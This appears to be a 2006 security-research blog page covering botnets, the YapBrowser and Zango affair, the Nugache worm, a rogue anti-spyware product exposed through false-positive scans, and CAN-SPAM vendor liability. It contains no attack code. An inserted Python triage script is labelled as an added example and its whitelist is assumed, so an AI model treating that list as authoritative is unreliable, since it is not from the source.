Internet Threats, IM, Malware, P2P, Spyware - Software in a World of Grey.
- Spyware Warriors and the Digital UnderGround: Part 1 & Part 2
Spyware Warriors and the Digital UnderGround: Part 1 & 2 Podcast Segments
Podcast conducted and moderated by Jeff Molander of Thoughtshapers.com
Guests:
Wayne Porter, Sr. Dir. Greynet Networks
Chris Boyd (PaperGhost), Dir. Malware Research
Facetime Communications
Wayne Porter and Chris Boyd (aka PaperGhost) get paid to spend their days infiltrating rings of real-life cyber criminals, all the while risking that they'll get caught by the thieves themselves. How must it feel to gather evidence on such bottom-feeders and then turn it over to the proper authorities? According to them, it feels great.
Spyware Warriors and the Digital UnderGround: Part 1
00:01 - Introduction
02:38 - What does Facetime do and for whom?
04:09 - What is a botnet network? (Boyd)
05:20 - What are hackers' and e-criminals' motivations? (Boyd)
06:11 - Things changing for the worse; paradigm shift (Porter)
07:55 - The story of RinCe, tipster on major bust (Boyd, Porter)
10:20 - Anatomy of a good tipster; motivations (Boyd)
11:44 - Changing vectors & new dangerous hacker tactics (Porter)
12:54 - Instant Messaging no longer safe (Porter)
13:24 - Botnet criminal motivations (Boyd)
13:44 - New perspectives (Molander)
14:34 - Attack complexity increasing, vectors changing (Porter)
16:24 - Dark Economy: Organized crime moving online (Porter)
16:59 - Cloak & Dagger: How to penetrate a botnet (Boyd)
19:03 - Gathering intelligence from "the underbelly" (Porter)
22:54 - Fallout from adware, spyware & Web crime (Porter)
23:34 - Warning to e-commerce executives (Porter)
Spyware Warriors and the Digital UnderGround: Part 2
Guests:
Wayne Porter, Sr. Dir. Greynet Networks
Chris Boyd (PaperGhost), Dir. Malware Research
Facetime Communications

Molander: In part two, I begin to discuss how and why major name advertisers (and advertising networks they work with) unknowingly get caught funding criminal activity.
Porter goes on to predict that the realm of click fraud is bound to get a lot more ugly as massive, criminal-operated networks of "zombie" PCs ("botnets") turn their guns in a new direction. Detecting them may, as it turns out, not be easy for Google, Yahoo Search, or others.
Spyware Warriors and the Digital UnderGround: Part 2
0:00 - Introduction
1:02 - How and why would major advertisers fund criminals?
2:04 - The Problem: brokers of ad brokers of ad brokers
2:34 - The connection between performance advertising and botnets, fraud
4:58 - Risk levels of cost per sale vs. cost per click vs. impression/CPM
6:28 - How brands are affected
7:16 - A new form of cost per click fraud?
9:19 - Small but widely distributed click fraud botnets may prove highly problematic
11:30 - Enterprise risks to botnets
11:48 - The potential for a new form of click fraud
13:44 - Web marketing, becoming less efficient and dangerous for brands
14:52 - "Botnets can be used for pay per click fraud" (Porter)
15:10 - Learn from the Past: AllAdvantage "Get Paid to Sleep" (Porter)
17:05 - New SpywareGuide.com blog
19:15 - Funny story: "Mr. Bean" movies among bad guys
21:31 - Closing remarks
So whatever happened to these botnet operators?...stay tuned...something ground-shaking did happen after the first articles and podcasts went to press...
- YAPBrowser- Questions & E-mail Interview
I received confirmation from the "Yap Browser" people, who stated they would work on answering the questions for next week. The questions for YapBrowser were written in English and then translated into Russian (thanks Anna and thanks Joe!), and they were urged to reply in Russian, their native language. As soon as I have their answers I will have them translated, once again, by two different teams and post the Russian answer document as well. All will follow the rules of engagement.
Wayne Porter's E-mail Interview: Questions to Yap Browser:
1. So that it is clear, what is the name of the entity or company that develops and operates YapBrowser?
2. Are YapBrowser and YapSearch.com controlled and/or operated by the same entity, or otherwise related?
3. For the purpose of general background information and mutual understanding, can you describe the business that you conduct on the Internet?
4. How long has YapBrowser been available for end-users to download from the Internet?
5. Aside from working with 180solutions, can you cite, as trade references, any other businesses or advertisers that you work with, have worked with in the past, or who have expressed interest in working with you in the future?
6. How long has YapBrowser bundled the 180solutions product, Zango?
7. How were you not aware over that period of time that your application / sites were redirecting to the offensive material?
8. How rigorous was 180solutions / Zango in checking your application before they agreed to have their software bundled with the YapBrowser application?
9. Did 180solutions test the software prior to your agreement to bundle Zango? If so, can you describe the process that was involved?
10. Did they test your application after it launched with the Zango product bundled?
11. Have you received payment from 180solutions for the Zango downloads you delivered?
12. Your sites were hosted on a server that also hosted known hijack sites and sites related to other allegedly illegal practices. Specific examples would include instme. biz and nstallme. info. At the time of my testing there were only six other sites residing on this server besides yours, and approximately 60+ sites on a related IP address; many of these were highly dubious and well known to the security community. Given the current state of Russian webmaster forums, where whole sections are devoted to "rogue" sites and installers, as well as the widespread coverage of these groups by Western security companies, how is it that you were not aware of the practices of your neighbours on this server?
13. How is it that you were not aware your chosen server host was well known and documented for hosting such sites and material?
14. To quote from your exchange with Paperghost at VitalSecurity.org:
Paperghost: The same details are used for a group of sites at Eltel, a Russian ISP, including one site that redirects the user to browser exploits at paradise-dialer.com, which load trojans, spyware and dialers. Paradise-dialer's whois places it as part of the CWS group known as Dimpy, aka BigBuks. Since the BigBuks whois is also given by mix-click, referred to by the yapbrowser/yapsearch whois, and the aforementioned servers at Pilosoft and Eltel (as well as the paradise-dialer server also at Pilosoft just a few IP addresses away) run many other sites that link back to browser exploits and child porn promotions run by BigBuks, it seems reasonable to assume that they are the same group of people.
So, is this you or not? And if not, how come the contact details are the same?
YapBrowser: We now try to find people which are involved in an illegal site. They had some attitude to domain names, but not to our activity. Similar these people are engaged in distribution illegal content and in parallel contain a server for this purpose. We have chosen a unsuccessful place of accommodation of the projects in a network.
Given your statements and acknowledgement of illegal content distribution, presumably you have accurate details of who you did business with for hosting. This would include business names, individual names, addresses, phone numbers, etc. You appear to claim to have been victimized by a supposedly legitimate business entity; are you willing to serve the public interest by making this information available in this interview? If so, please provide details. If not, why not?
15. It has been brought to my attention that a representative of YapBrowser is John Helbert, as seen here:
http://sunbeltblog.blogspot.com/2006/04/yapbrowser-getting-yelled-at.html
A connection has been made between this person and an individual called "Klass", a member of a "Lolita / CP" board called "Dark Master" (matching ICQ numbers, etc.). More on this connection can be seen here:
Sunbelt Haloscan comments
What is your response to this connection between YapBrowser and the "Dark Master" forums?
16. Ben Edelman provides video evidence of the dubious activities of an outfit called HighConvert working with a number of adware companies. See video: http://www.benedelman.org/scripts/video/?v=highconvert-081505
This operation appears to be related to a document uncovered and transcribed from Russian into English by Sunbelt Software in early April. The YapSearch domain is cited in this document. Reference English translation of the document here: Sunbelt Translation Document.
The document outlines plans for "invisible clickers", lowering of browser security settings, utilizing the "Blue Screen of Death" for trick ads, and the changing of 404 error pages, among other dubious practices. How do you explain this reference to YapSearch?
17. Did YapSearch or YapBrowser ever deploy any of the tactics outlined in this document?
18. Given the current state of affairs, what is the future for YapBrowser? Do you still intend to distribute this application?
- Nugache: The Shape of Things to Come in P2P Land
As detailed over at Shadowserver.org, this is a particularly new and nasty beast. Called "Nugache", it has email capabilities, attacks various vulnerabilities and has crazy leet FTP skills. The FTP powers are lying dormant for the moment; however, this will surely change when the all-singing, all-dancing Nugache Mark 2 hits the streets.
Currently, the theory goes that (while spreading via P2P), if the IRC-based Command & Control center is shut down, some nifty P2P coding will "reclaim" the potentially lost bots and start the whole thing up again at a later date. Sounds like there's some messed up coding in this thing at present, so it shouldn't hit too hard for the moment. Just be extra careful in P2P land, because at some point this thing is going to bite down hard.
Good news is, we've detected this thing since early January and enterprise customers are safe. Home users will have to remain vigilant for the time being - but then, if you're using P2P you should be anyway...
- Deception, Deceit and Dollars- Spotting Red Flags
While Googling to download HijackThis, I spotted a link from Google's AdSense program. Check out the following screenshot:
(Note: the red X is part of the SiteAdvisor program, which can help users spot sites that use deceptive practices, and is only displayed if you are using the program.)
In the above screenshot, clicking the link "HijackThis Free download" opens the site http://hijack-this.net/. Naturally, curiosity compelled me to dig deeper into this site, and I also wanted to know what Merijn, the original creator of HJT, had to say about it. It appears it struck his radar a long time ago, and he was not pleased that the name of his product was being used to push other commercial products.
He states at http://www.merijn.org/:
"April 22, 2005:
Just a short note on the domain HIJACK-THIS.NET: this is not mine! It has been registered by an affiliate of XoftSpy (who are also on the Rogue Antispyware List on SpywareWarrior.com) and they are luring people into downloading their software believing it is HijackThis. Also, they have registered a few AdWords at Google leading to the same result. We'll see where this goes. In the meantime, if you want to download any of my programs, the official domain is and always will be www.merijn.org."
UPDATE: April 29, 2005:
I just received word from Paretologic (the owners of XoftSpy) that the affiliate responsible for the page has been terminated and the site will be taken down. That's one down, one to go. :)"
Let's dig into this mystery...
More Googling about this website turned up a series of rogue anti-spyware products being downloaded from hijack-this.net and served through a third-party affiliate aggregator, hop.clickbank.net, known as ClickBank. The anti-spyware software behind the link changed frequently, pointing to what appear to be different products. Google's cached copy of the hijack-this.net page displayed the following:
Hijack-This.net
Your computer may be infected with harmful spyware programs.
These spyware infections can lead to computer crashes, instability, slowness, and full system failure.
Immediate removal may be required.
Please try the following:
* Click here to scan your computer for hidden spyware programs.
* When you see a grey download box like the one shown below, click the Open or Run button to download the free scanner.
* After the download completes, scanner will automatically install and load and show you a list of spyware programs on your machine -- and tell you how to get rid of them.
If you get an error message when trying to download the software -- or the software does not open automatically on your computer after the download completes -- click here for help.
By downloading the free scanner, you agree to the End User License Agreement.
© Copyright 2004-2005, Hijack-This.net All Rights Reserved.
If you were to click "Click Here", it would begin to download the "so-called" anti-spyware "Adware Alert", which was listed as a rogue, although the new version of "Adware Alert" was de-listed from the SpywareWarrior Rogue List.
Suzi Turner, of ZDNet, wrote about this website some time back. Apparently this site sold "NoAdware" for a period of time, which is also classified by many as a rogue product. This information can be found in the comments section of the SpywareWarrior blog entry.
A note from CastleCops says the "bad guys" registered this domain to make users believe it is the original HijackThis. This is rather deceptive and a prime example of how rogue affiliates leech onto a popular free program to drive sales of programs with big commissions.
Check out the following screenshot of the hijack-this.net website:
This website appears to actively discourage the user from downloading HijackThis with a warning containing the following:
“ HijackThis tool can only be used by advanced users, especially warning the user…
... it can lead to more serious complications on your PC - such as your Internet no longer working or problems with running Windows itself. Use at your own risk."
This is ironic, since the original advertisement stated "accept no substitutes" and the ad term targeted was hijackthis.
In the above part of the website there is a link to the original HijackThis program. At first glance the website does not look suspicious: it contains only plain text, no pop-ups and no banner ads. Coupled with a domain name that mimics someone else's program, it is easy to see how the affiliate causes confusion.
Another notable piece of content from hijack-this.net:
"...SpyOnThis is a powerful alternative to HijackThis for anyone facing problems with Spyware, Adware, and Hijackers on their PC...
...Click here to visit the SpyOnThis homepage and download SpyOnThis free of charge...."
In summary, we have an affiliate using a URL that mimics a popular, albeit advanced, helper utility against spyware. However, they claim SpyOnThis is a very good alternative to HijackThis, especially if you are not an advanced user. "Click here" in the above content links to the page http://www.spyonthis.net/index.html via the link http://hijackthis.spyonthis.hop.clickbank.net/, confirming it is going through an affiliate program aggregator called ClickBank. The site looks like the following:
Note there is no Privacy Policy on the website. This is an additional "red flag" a user should be aware of.
At this point I decided to take a deep dive: I downloaded the software manually and installed it on a clean machine under VMware to ensure the system was clean. During installation the software does display a EULA. You can download the EULA from this link:
SpyOnthisEULA
SpyOnThis looks like this in the following snapshot:
Here is where the problems become flagrant. Upon scanning a completely clean machine, SpyOnThis flagged valid registry keys and cookies as spyware applications such as ClearSearch, Claria, e-Surveiller and Bargain Buddy. The following snapshot shows the detections that SpyOnThis returned on a clean machine:
Scan started : 4/24/2006 3:39:19 PM
Total items scanned : 18010
Objects found : 13
Objects ignored : 0
ClearSearch object found!!!
Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLS
RiskLevel: 4
ClearSearch object found!!!
Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CRLS
RiskLevel: 4
Claria object found!!!
Object: Claria
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_USERS:.default\software\microsoft\systemcertificates\trustedpublisher\crls
RiskLevel: 3
Possible Browser Hijack object found!!!
Object: Possible Browser Hijack
Class: REGDATA
Type: HIJACKER
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN[START PAGE="ABOUT:BLANK"]
RiskLevel: 3
e-Surveiller object found!!!
Object: e-Surveiller
Class: REGKEY
Type: KEY LOGGER
FoundIn: HKEY_LOCAL_MACHINE:SOFTWARE\Classes\.zlg
RiskLevel: 6
e-Surveiller object found!!!
Object: e-Surveiller
Class: REGKEY
Type: KEY LOGGER
FoundIn: HKEY_CLASSES_ROOT:.zlg
RiskLevel: 6
Bargain Buddy Bundle object found!!!
Object: Bargain Buddy Bundle
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_LOCAL_MACHINE:SOFTWARE\Microsoft\Code Store Database
RiskLevel: 3
Cookie object found!!!
Object: Cookie
Class: TRACKING COOKIE
Type: SPYWARE
FoundIn: C:\Documents and Settings\Administrator\Cookies\administrator@2o7[2].txt
RiskLevel: 0
Cookie object found!!!
Object: Cookie
Class: TRACKING COOKIE
Type: SPYWARE
FoundIn: C:\Documents and Settings\Administrator\Cookies\administrator@cgi-bin[1].txt
RiskLevel: 0
Cookie object found!!!
Object: Cookie
Class: TRACKING COOKIE
Type: SPYWARE
FoundIn: C:\Documents and Settings\Administrator\Cookies\administrator@mediaplex[1].txt
RiskLevel: 0
AGM65's FileCD Key Harvester 0.2 object found!!!
Object: AGM65's FileCD Key Harvester 0.2
Class: FILE
Type: CRACKING TOOL
FoundIn: C:\Program Files\upx125w\COPYING
RiskLevel: 3
AGM65's FileCD Key Harvester 0.2 object found!!!
Object: AGM65's FileCD Key Harvester 0.2
Class: FILE
Type: CRACKING TOOL
FoundIn: C:\Program Files\upx125w\LICENSE
RiskLevel: 3
AGM65's FileCD Key Harvester 0.2 object found!!!
Object: AGM65's FileCD Key Harvester 0.2
Class: FILE
Type: CRACKING TOOL
FoundIn: C:\Program Files\upx125w\README
RiskLevel: 3
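A triage pass over the report format shown above, as an added example (not code from the original post or from any vendor's tool): it parses the Object/Class/Type/FoundIn/RiskLevel records and labels detections that sit in the stock Windows locations the post calls valid keys, in plain-text licence files, or in zero-risk cookies, leaving everything else for a human to verify. The baseline location list is an assumption for illustration, and the embedded sample is a subset of the report above.

```python
"""Triage a SpyOnThis-style scan report for likely false positives.

Added example, not part of the original post or of any vendor tool.
The record format (Object/Class/Type/FoundIn/RiskLevel) follows the
report shown above; the baseline list is an assumed illustration,
not an authoritative whitelist.
"""
import re
from dataclasses import dataclass

# Registry locations the post identifies as valid keys on a clean
# machine; a "spyware" hit on one of these says nothing about infection.
# (Assumed baseline for this example.)
BASELINE_LOCATIONS = (
    r'SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER',
    r'SOFTWARE\MICROSOFT\CODE STORE DATABASE',
    r'SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN[START PAGE="ABOUT:BLANK"]',
)
# Plain-text files that cannot execute; a "cracking tool" hit here is noise.
TEXT_FILE_NAMES = {"COPYING", "LICENSE", "README"}


@dataclass
class Detection:
    name: str
    cls: str       # REGKEY, REGDATA, FILE, TRACKING COOKIE, ...
    kind: str      # SPYWARE, HIJACKER, KEY LOGGER, ...
    found_in: str  # registry path or file path
    risk: int


RECORD_RE = re.compile(
    r"Object:\s*(?P<name>.+?)\s*\n"
    r"Class:\s*(?P<cls>.+?)\s*\n"
    r"Type:\s*(?P<kind>.+?)\s*\n"
    r"FoundIn:\s*(?P<found>.+?)\s*\n"
    r"RiskLevel:\s*(?P<risk>\d+)"
)


def parse_report(text: str) -> list[Detection]:
    """Extract every detection record from the report text."""
    return [
        Detection(m["name"], m["cls"], m["kind"], m["found"].strip(), int(m["risk"]))
        for m in RECORD_RE.finditer(text)
    ]


def triage(d: Detection) -> str:
    """Return a triage label; 'unverified' means a human must look."""
    loc = d.found_in.upper()
    if d.cls in ("REGKEY", "REGDATA"):
        if any(base.upper() in loc for base in BASELINE_LOCATIONS):
            return "baseline-location"
    if d.cls == "FILE" and loc.rsplit("\\", 1)[-1] in TEXT_FILE_NAMES:
        return "non-executable-text"
    if d.cls == "TRACKING COOKIE" and d.risk == 0:
        return "zero-risk-cookie"
    return "unverified"


def summarize(text: str) -> dict[str, int]:
    """Count detections per triage label."""
    counts: dict[str, int] = {}
    for d in parse_report(text):
        label = triage(d)
        counts[label] = counts.get(label, 0) + 1
    return counts


# Sample records copied from the clean-machine scan shown above.
SAMPLE_REPORT = r"""
ClearSearch object found!!!
Object: ClearSearch
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLS
RiskLevel: 4
Possible Browser Hijack object found!!!
Object: Possible Browser Hijack
Class: REGDATA
Type: HIJACKER
FoundIn: HKEY_CURRENT_USER:SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN[START PAGE="ABOUT:BLANK"]
RiskLevel: 3
e-Surveiller object found!!!
Object: e-Surveiller
Class: REGKEY
Type: KEY LOGGER
FoundIn: HKEY_CLASSES_ROOT:.zlg
RiskLevel: 6
Bargain Buddy Bundle object found!!!
Object: Bargain Buddy Bundle
Class: REGKEY
Type: SPYWARE
FoundIn: HKEY_LOCAL_MACHINE:SOFTWARE\Microsoft\Code Store Database
RiskLevel: 3
Cookie object found!!!
Object: Cookie
Class: TRACKING COOKIE
Type: SPYWARE
FoundIn: C:\Documents and Settings\Administrator\Cookies\administrator@2o7[2].txt
RiskLevel: 0
AGM65's FileCD Key Harvester 0.2 object found!!!
Object: AGM65's FileCD Key Harvester 0.2
Class: FILE
Type: CRACKING TOOL
FoundIn: C:\Program Files\upx125w\COPYING
RiskLevel: 3
"""

if __name__ == "__main__":
    for det in parse_report(SAMPLE_REPORT):
        print(f"{triage(det):20} {det.name} -> {det.found_in}")
    print(summarize(SAMPLE_REPORT))
```

The .zlg hit lands in "unverified" on purpose: the heuristic only clears locations it can vouch for, so anything outside the baseline still gets a manual look.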
Naturally, to remove the various registry keys (which are valid keys, making them either false positives or possibly intentionally deceptive), it asks the user to register the product in this fashion:
If we click 'OK' it redirects to the page where the product can be registered, http://www.spyonthis.net/registration.html. It asks for an email address and name, and clicking the Order button redirects to the ClickBank website, where the product can be purchased. The process continues with the country name and postal code; clicking the button "Continue to step 2" opens a form like the following, which is the standard checkout process for products sold through the ClickBank network.
If we look carefully at the bottom of the above snapshot, it shows affiliate=hijackthis. This is probably an internal tracking mechanism that allows the affiliate to see where the sale is originating from; this is a common form of crude web analytics.
In this scenario several parties benefit from this scheme:
1) Hijack-This.net is the affiliate who will receive a commission for selling the product.
2) ClickBank, the affiliate aggregator, will receive a smaller commission for the sale of this product.
3) SpyonThis, the merchant, will receive monies less the money paid to Hijack-This.net and the fee from Clickbank for facilitating the transaction.
4) Google benefits by charging the affiliate a per-click fee for the ad.
It is also notable, according to SiteAdvisor, that in the past hijack-this.net also promoted a program called MySpywareCleaner (well documented at SysInternals.com), which is no longer available for download.
This probably stems from the lawsuit filed against its owners by the U.S. District Court in Seattle, which accuses New York-based Secure Computer, as well as associates in the United States and India, of marketing software that falsely claims computers are infected with spyware and selling consumers a program that claims to remove it. In fact, the software renders computers more susceptible to attacks. Secure Computer also owned several Web sites, including myspywarecleaner.com, myerrorfixer.com, and checkforspyware.com.
Washington’s new spyware act prohibits inducing a computer user to download software by making any false claims that the software is necessary for security purposes. It further prohibits software from surreptitiously modifying a computer’s security settings. The statute carries a penalty of $100,000 per violation.
If found liable, the defendants can also be fined up to $250 per violation under the federal CAN-SPAM act, $500 per violation under Washington’s spam act, $2,000 per violation under the Consumer Protection Act, as well as other restitution to be determined by the court.
In summary, it is important to check out a program's history and look for "red flags"; in this case they are very evident with a little sleuth work:
- Use of another popular freeware program to lure in new users
- The ad says "Accept No Substitutes" but the page itself is designed and does offer a substitute
- Glaring false positives upon scanning a machine in the VMWare (clean) environment
- Bidding on the term "HiJackThis" and "Hijack This" in order to lure in users by usurping the name of another program
- Language crafted to discourage using HiJackThis if you are not an advanced user or afraid of "taking risks"
- Past affiliation promoting a program that is currently being sued by the U.S. District Court in Seattle for deceptive practices
- Domain ownership is "masked"; it's hidden under the name: Domain Listing Agent (NRPDB)
- No link to any privacy policy on the website
Note: http://www.hijack-this.net/eula.html is active at the moment; however, there is no link to it from the homepage of the domain. This EULA can be downloaded from the link:
HiJackThis EULA
- Facetime Security Lab Researchers Net Two Microsoft MVP Security Awards
I am pleased to announce that two members of the FSL research team received Microsoft Security MVP Awards this year: Wayne Porter, Sr. Director of Greynets Research, and Chris Boyd, Director of Malware Research. This is my first time receiving this honor, but it is the second year running for the indefatigable Chris Boyd, a.k.a. PaperGhost.
The Microsoft Most Valuable Professional (MVP) Award is an annual award that is given to outstanding members of Microsoft's peer-to-peer communities, and is based on the past year's contributions those members make in those communities online and offline.
You can learn more about the awards at the Microsoft MVP FAQ or check out the official MSFT MVP site.
A little history and color about the awards from Wikipedia:
The Microsoft Most Valuable Professional (MVP) Program is an award and recognition program run by Microsoft. Microsoft MVPs are volunteers who have been awarded for providing technical expertise towards communities supporting Microsoft products or technologies. An MVP is awarded for contributions over the past year.
The MVP program grew out of the developer community: rumor has it the initials stood for "Most Valuable Professional", as the initial MVPs were drawn from the online peer support communities such as Usenet and CompuServe. It has since grown to include other types of products, and other avenues of contribution.
A posting from Tamar Granor on the Universal Thread web site gives this account of the origin of the MVP program.
"Way back in the dark ages, Microsoft provided a great deal of technical support on CompuServe. The CompuServe FoxPro forum was extremely busy and Calvin Hsia, then an independent developer, now Developer Lead on the Fox team, created what we called "Calvin's List." It was a listing of the number of postings by person, including info on both messages sent and received. Being in the top 10 on Calvin's List any month was an accomplishment, though we discussed whether it was a good thing or a bad thing. "
As the story goes, some of the Microsoft people jumped on Calvin's List as a way to identify high contributors, and thus was born the MVP program.
- Spam- Anne Mitchell Clarifies The McCain Amendment
Question: What is the McCain Amendment as it relates to CAN-SPAM?
Level: Advanced
This is a tough one, so I tracked down a real expert for the answer: Anne Mitchell, Esq., CEO of the Institute for Spam and Internet Public Policy, and a Professor of Law in California.
This interview is an attempt to try to clarify the news I reported here earlier coming out of TheInternetPatrol.com report on the lawsuit that went all the way up and down the chain.
It wasn't easy catching her as she was busy preparing for a workshop, but I think we have some solid answers for readers. (And thanks Anne for taking the time!) So to recap we're talking about the recent announcement by the Federal Trade Commission and California Attorney General Bill Lockyer that they have settled a lawsuit in which they went after a spammer both for the spam they sent, and for the spam which their affiliates sent. Let's dive in!
Wayne: Anne, the burning question here is how is it possible that they went after the vendor and affiliates as well?
Anne: I'm really glad that you asked that Wayne. When CAN-SPAM was passed, there was a lot of gnashing of teeth and wiping of eyes as people decried it to be the U-CAN-SPAM Act, and said that it was a worse than useless law. Unfortunately, what *nobody* seemed to be aware of - and even though we mentioned it in every press interview the press never picked up on it (perhaps because they didn't realize how big it was) - was this little section of CAN-SPAM which we refer to affectionately as "The McCain Amendment". This section of CAN-SPAM, which I call the "vendor liability" section, basically says that if you stand to benefit from the spam, *even if you don't send* the spam, you are on the hook legally just as much as if you *had* been the one who pushed 'send'.
Wayne: Good- no more using affiliate mules, I hope. So we go to the top of the money chain. OK, the ramifications of this are potentially huge. I find it hard to believe most people didn't know about this?
Anne: Well, as I said, the press didn't seem to really understand what an incredible tool this was for anti-spam enforcement, and the people who were slamming CAN-SPAM were so upset over it being an opt-out law instead of opt-in law that they weren't really interested in looking for any Easter eggs, so to speak.
Now, I happen to know that Senator McCain's office, as they were contemplating introducing this amendment to the bill which eventually became CAN-SPAM, specifically wanted to take aim at those vendors who either used affiliates to do their spamming, or who turned a blind eye to spamming affiliates.
Wayne: I have seen the myopia some merchants display. But how do you know that for sure?
Anne: Because they called me when they first were contemplating the amendment, and asked me how best they could do that, and in fact I helped to author the McCain amendment.
Wayne: Very cool. Authoring amendments is beyond me- so how does it actually work?
Anne: It's pretty simple. We distinguish between "senders" (those who hit 'send' and inject the spam into the Internet stream) and "vendors" (those whose wares are being advertised in the spam or who otherwise benefit from the spam payload). Now, often the sender and the vendor are one and the same. But often they are two different entities. And in those cases, prior to the McCain amendment, the vendor was able to say "hey, it wasn't me who sent it. You're barking up the wrong tree. Now go away." And that would often be the end of it, primarily because the sender was so well hidden, or when they could be traced they were in another country, beyond U.S. jurisdiction.
Vendor liability addresses all of these problems in one fell swoop. No longer can the vendor who utilizes spam hide behind their affiliates or hired spam guns. And it's easy as anything to find the vendor because hey, they want you to give them money. And in order to give them money, you have to be able to find them. And because you are giving them money, that almost always means that they have a connection - their bank or credit card processor or such - to the United States, even if they themselves are hiding offshore. Which means that jurisdiction is no longer a problem.
Wayne: I always love the money trail. OK, so the burning question I am sure on people's minds will be: "What about the legitimate businesses who truly don't know that they may have a rogue affiliate, or that the marketing expert they engaged to do their email campaign is actually spamming or using the services of a spammer?" It's easy enough to imagine this could hurt legitimate business people who accidentally or innocently fall in with the wrong crowd.
Anne: The standard for nailing someone under the McCain Amendment is that they either knew or should have known that they were benefiting from spamming activity. It's not rocket science. When you are in business, you have to do reasonable due diligence for all sorts of things, and to whom you give your email campaign for sending is no exception.
The exact language from the law is that the vendor:
(1) knows, or should have known in the ordinary course of that person's trade or business, that the goods, products, property, or services sold, offered for sale, leased or offered for lease, or otherwise made available through that trade or business were being promoted in such a message;
(2) received or expected to receive an economic benefit from such promotion; and
(3) took no reasonable action -
(A) to prevent the transmission; or
(B) to detect the transmission and report it to the Commission.
Wayne: Good! Sounds like this could be the beginning of a real tool for reform.
Anne: Yes, unfortunately, in their infinite wisdom, as the legislature was finalizing CAN-SPAM, they reserved the power to enforce the McCain amendment (which is, by the way, in the actual code is called "SECTION 6. BUSINESSES KNOWINGLY PROMOTED BY ELECTRONIC MAIL WITH FALSE OR MISLEADING TRANSMISSION INFORMATION", or just "Section 6") to just the Federal Trade Commission, meaning that even though state attorneys general and even ISPs are empowered to bring a lawsuit under CAN-SPAM, only the FTC can bring a vendor liability action under Section 6. But, as has been demonstrated by this announcement, states and the FTC are very cooperative in this regard, and if a state attorney general, or even a larger ISP, felt they had a case under Section 6, the FTC would certainly want to hear about it.
Wayne: Anne, this is great stuff. Thank you so much for explaining it to me and the folks here and taking time out of your busy schedule!
Anne: You're welcome!
Author Postscript: I forgot to ask Anne if this applied to SPIM (spam sent through IM) but perhaps when she is done workshopping I can get some more intel. I can also hope this type of bite gets put into something to contain unruly "adware" vendors who continually claim to be "victims".
- Yapbrowser...Not Something You'd Want to Plugin To!
This one has crept across the radar of the security pros, and analysis can now be found here and here.
For those not in the know, Yapbrowser is a browser "search tool". Unfortunately, none of the paid-for links work (they return a blank page), and anything entered into the browser redirects to...illegal pornography. What makes this even more interesting is that you need to install Zango (from 180 Solutions) to run the application.
The response, or perhaps lack of one, from 180 should be interesting, to say the least...I wonder how it will differ from the interview Wayne Porter did with them a year ago.
They said...
First, 180solutions cares a tremendous amount about what users think about our software from how it is distributed to how it works on a user's machine. As our company has grown, our company has and will continue to invest heavily in user-focused initiatives. Going forward, through the use of additional staff and innovative technology, we will dramatically increase control over how our partners operate. We understand and accept the responsibility to monitor and police our partners.
Historically, 180solutions has not installed software; we relied on a network of partners to distribute our applications. Over the last year, 180solutions has placed greater emphasis on managing distribution partners as well as moving to maintain more control over how our software is installed on users' machines. In response to public and our own concerns, we carefully monitor our channels for conduct we find inappropriate. 180solutions has a stringent distributor code of conduct in place and frequently audits distribution partners.
Reference:
Porter's Preface to 180 Solutions Response & Some Software Philosophy.
Official Response from 180solutions to Porter's Questions
- Museum of Modern Betas- Coming Down The Pipe
As a researcher it is critical to look not only at what is on the ground but also at what is coming down the pipe in terms of development ideas.
This site lists all sorts of sites and applications which are in beta, and it is a handy reference for the curious. For the REALLY curious, check out the current alpha releases.
Check out the Museum of Modern Betas.
Note that Google has over 70 betas!
# Selling on Google Base Apr 16
# Google Calendar Apr 13
# Google Related Links Apr 5
# Google Suggest Japan Apr 5
# Google Rooms Apr 1
# Google Romance Apr 1
# Google Circles Mar 31
# Google local business ads Mar 31
# Google! (1998) Mar 30
# Google Finance Mar 21
# Google Safe Browsing for Firefox Mar 17
# Google Blogger Web Comments for Firefox Mar 17
# Google Books Partner Program Mar 14
# Google Nieuws Nederland Mar 14
# Google Catalogs Mar 13
# Google Noticias Venezuela Mar 11
# Google Noticias Peru Mar 11
# Google Noticias Cuba Mar 11
# Google Noticias Colombia Mar 11
# Google News South Africa Mar 11
# Google News Israel Mar 8
# Google AdWords Editor Mar 7
# Google News Taiwan Mar 3
# Google News HongKong Mar 3
# Google News Italia Mar 3
# Google Noticias Espana Mar 3
# Google Ricerca Libri Mar 1
# Google Búsqueda de libros Mar 1
# Google Recherche de livres Mar 1
# Google Buchsuche Mar 1
# Google Brin Creator Feb 28
# Google News Deutschland Feb 28
# Google News Österreich Feb 28
# Google News Japan Feb 28
# Google News China Feb 28
# Google Page Creator Feb 23
# Gmail for your domain Feb 11
# Google Noticias Portugal Jan 27
# Google Noticias Brasil Jan 27
# Map Builder Jan 27
# Google Pack Jan 10
# Google Transit Dec 9
# Google Services Guide Dec 7
# Google Ride Finder Dec 7
# Froogle Merchant Center Dec 7
# Site-Flavored Google Search Dec 7
# Froogle Shopping List Dec 7
# Gtalkr Dec 1
# Google Publication Ads Nov 22
# Google AdSense for Feeds Nov 19
# Google Book Search Nov 17
# Google Base Nov 16
# Google Language Tools Nov 2
# Google Bendi Oct 30
# Google Sitemaps Oct 29
# Google SMS Oct 27
# Google Gulp Oct 25
# Google Site Map Generator Oct 20
# Google Total Oct 15
# Nuah: Google Sitemap Oct 10
# Nuah: Google Pagerank Crawler Oct 10
# Google Reader Oct 7
# Froogle Oct 4
# Google Print Oct 4
# Google Local Oct 3
# Google Alerts Oct 3
# Google Groups Oct 3
# Google Scholar Oct 3
# Google Maps Oct 3
# Google Video Oct 3
# Google Personalized Search Oct 3
# Goggle Suggest Oct 3
